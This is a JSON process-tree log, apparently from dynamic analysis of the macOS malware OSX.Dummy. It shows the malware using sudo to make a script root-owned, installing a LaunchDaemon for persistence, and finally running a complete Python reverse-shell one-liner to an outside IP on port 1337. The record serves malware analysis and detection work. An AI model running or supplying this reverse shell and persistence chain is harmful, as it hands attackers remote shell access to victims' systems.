OSX.Dummy Process Tree
{
"process_name": "/Users/zingo123/Downloads/OSX.Dummy/script",
"pid": 2607,
"command_line_args": "./script",
"child_processes": [
{
"process_name": "/usr/bin/sudo",
"pid": 2608,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /tmp/script.sh",
"child_processes": [
{
"process_name": "/usr/sbin/chown",
"pid": 2610,
"command_line_args": "chown root /tmp/script.sh"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2609,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2609,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2611,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chmod +x /tmp/script.sh",
"child_processes": [
{
"process_name": "/bin/chmod",
"pid": 2613,
"command_line_args": "chmod +x /tmp/script.sh"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2612,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2612,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2614,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/script.sh /var/root/",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2617,
"command_line_args": "mv /tmp/script.sh /var/root/"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2615,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2615,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2616,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2616,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2618,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/com.startup.plist /Library/LaunchDaemons/",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2621,
"command_line_args": "mv /tmp/com.startup.plist /Library/LaunchDaemons/"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2619,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2619,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2620,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2620,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2622,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2622,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2623,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /Library/LaunchDaemons/com.startup.plist",
"child_processes": [
{
"process_name": "/usr/sbin/chown",
"pid": 2626,
"command_line_args": "chown root /Library/LaunchDaemons/com.startup.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2624,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2624,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2625,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2625,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/usr/bin/sudo",
"pid": 2627,
"command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# launchctl load -w /Library/LaunchDaemons/com.startup.plist",
"child_processes": [
{
"process_name": "/bin/launchctl",
"pid": 2629,
"command_line_args": "launchctl load -w /Library/LaunchDaemons/com.startup.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2628,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2628,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2630,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2630,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2633,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
},
{
"process_name": "/bin/sh",
"pid": 2633,
"command_line_args": "/bin/sh -c ps -eo pid,comm"
}
]
}
{
"process_name": "/dev/console",
"pid": 2631,
"command_line_args": "xpcproxy com.startup",
"child_processes": [
{
"process_name": "/usr/bin/python",
"pid": 2632,
"command_line_args": "python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"185.243.115.230\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);"
}
]
}